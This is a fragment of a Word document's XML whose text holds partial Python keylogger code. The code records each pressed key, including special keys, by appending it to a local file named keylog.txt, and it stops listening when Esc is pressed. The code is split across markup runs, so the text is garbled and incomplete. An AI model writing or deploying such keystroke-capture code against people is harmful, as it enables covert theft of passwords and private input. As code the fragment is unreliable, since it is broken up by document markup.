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def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on_press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(key):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    </w:t>
      </w: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try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>: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        </w:t>
      </w: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with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 open("keylog.txt", "a") as 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log_file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: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log_</w:t>
      </w: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file.write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>f"{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key.char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}")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    </w:t>
      </w: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except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AttributeError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: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        </w:t>
      </w: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with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 open("keylog.txt", "a") as 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log_file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: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log_</w:t>
      </w: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file.write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>f" [{key}] ")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def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on_release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(key):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    </w:t>
      </w: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if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 key == </w:t>
      </w:r>
      <w:proofErr w:type="spell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keyboard.Key.esc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF45BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>:  # Stop the listener on pressing Esc key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF45BF" w:rsidRPr="00DF45BF" w:rsidRDefault="00DF45BF" w:rsidP="00DF4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        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF45BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF45BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> False</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C669ED" w:rsidRDefault="00C669ED"/>
    <w:sectPr w:rsidR="00C669ED" w:rsidSect="00C6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45BF"/>
    <w:rsid w:val="00C669ED"/>
    <w:rsid w:val="00DF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2024-08-23T17:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-23T17:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>